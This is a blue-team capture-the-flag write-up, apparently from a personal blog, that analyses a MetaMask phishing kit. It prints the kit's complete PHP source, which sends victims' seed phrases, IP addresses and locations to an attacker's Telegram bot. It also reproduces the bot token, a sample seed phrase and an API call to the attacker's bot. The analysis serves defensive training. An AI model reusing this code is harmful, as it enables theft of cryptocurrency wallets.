GrabThePhisher Blue Team Challenge

date

Aug 31, 2023

slug

cyberdefenders-grabthephisher

author

status

Public

1. Which wallet is used for asking the seed phrase?

Metamask

2. What is the file name that has the code for the phishing kit?

Since Metamask has a separate pop out compared to the rest of the wallets, I’ve decided to see the code for Metamask.

There is a folder especially for Metamask, which makes it suspicious already 👀

There was a file called metamask.php inside the metamask folder, and this was its content:


<?php
	$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']); 
	$array = json_decode($request);
	$geo = $array->country->name_en;
	$city = $array->city->name_en;
	$date = date("m.d.Y"); //aaja
	
	/*
	 With love and respect to all the hustler out there,
	 This is a small gift to my brothers,
	 All the best with your luck,
	 
	 Regards, 
	 j1j1b1s@m3r0
	*/
	
	$message = "<b>Welcome 2 The Jungle </b> 
	    
	<b>Wallet:</b> Metamask
	<b>Phrase:</b> <code>" . $_POST["data"] . "</code>
	<b>IP:</b> " .$_SERVER['REMOTE_ADDR'] . " | " .$geo. " | " .$city. "
	<b>User:</b> " . $_SERVER['HTTP_USER_AGENT'] . "";
	
	sendTel($message);  
		
	function sendTel($message) {
			$id = "5442785564"; 
	    $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10"; 
			$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
			file_get_contents($filename);
	    $_POST["import-account__secret-phrase"]. $text = $_POST['data']."\n";;
	    @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);	
	}
?>

This PHP code seems to be a script designed to interact with the SypexGeo API and Telegram API. Let's break down what each part of the code does:

SypexGeo API Interaction:

The script uses the file_get_contents function to make a GET request to the SypexGeo API. It fetches JSON data from the API using the URL "http://api.sypexgeo.net/json/" concatenated with the user's IP address $_SERVER['REMOTE_ADDR'].

The JSON response is then decoded into an array using json_decode.

The country name and city name in English is extracted from the decoded array using $array->country->name_en and $array->city->name_en respectively.

Comments:

The code includes some comments that seem to be left by the author (j1j1b1s@m3r0)

Telegram API Interaction:

The script constructs a message containing various details:

Wallet information (Metamask)
The user's provided phrase from a POST request
User's IP address, country, and city
User agent (browser/device) information from the $_SERVER['HTTP_USER_AGENT'] variable

The sendTel function is invoked, passing the constructed message.

Telegram Message Sending:

The sendTel function takes the constructed message and sends it to a Telegram chat using the Telegram Bot API.

The Telegram Bot API token and chat ID are used to construct the API endpoint URL.

The message is URL-encoded and passed as a parameter to the Telegram API URL using file_get_contents.

Log File Operation:

The script attempts to append the provided phrase from the POST request to a log file named 'log.txt' in a directory on the server.

The directory path is determined using $_SERVER['DOCUMENT_ROOT'].

metamask.php

3. In which language was the kit written?

Covered in Q2, the extension states it

php

4. What service does the kit use to retrieve the victim's machine information?

Covered in Q2, the script uses the file_get_contents function to make a GET request to the SypexGeo API. It fetches JSON data from the API using the URL "http://api.sypexgeo.net/json/" concatenated with the user's IP address $_SERVER['REMOTE_ADDR'].

Sypex Geo

5. How many seed phrases were already collected?

In Q2, it was mentioned that the script attempts to append the provided phrase from the POST request to a log file named 'log.txt' in a directory on the server. So log.txt is located in the log folder, and this was its contents:

3

6. Write down the seed phrase of the most recent phishing incident?

In Q2, it was mentioned that the script attempts to append the provided phrase from the POST request to a log file named 'log.txt' in a directory on the server, so the answer will be the last line in log.txt.

father also recycle embody balance concert mechanic believe owner pair muffin hockey

7. Which medium had been used for credential dumping?

Covered in Q2, the sendTel function takes the constructed message and sends it to a Telegram chat using the Telegram Bot API.

Telegram

8. What is the token for the channel?

Covered in Q2, the token for the Telegram channel was assigned to the $token variable.

5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10

9. What is the chat ID of the phisher's channel?

Covered in Q2, the chat ID for the Telegram channel was assigned to the $id variable.

5442785564

10. What are the allies of the phish kit developer?

Covered in Q2, this was mentioned in the comments.

j1j1b1s@m3r0

11. What is the full name of the Phish Actor?

Since the link to make an API call to the Telegram Bot API was already in metamask.php, I tried calling the API by navigating to this (I put a hello as placeholder for the API call):

https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/sendMessage?chat_id=5442785564&text=hello&parse_mode=html

So just combine the first_name and last_name, you’ll get:

Marcus Aurelius

12. What is the username of the Phish Actor?

Mentioned in Q11, username variable in the API Call output.

pumpkinboii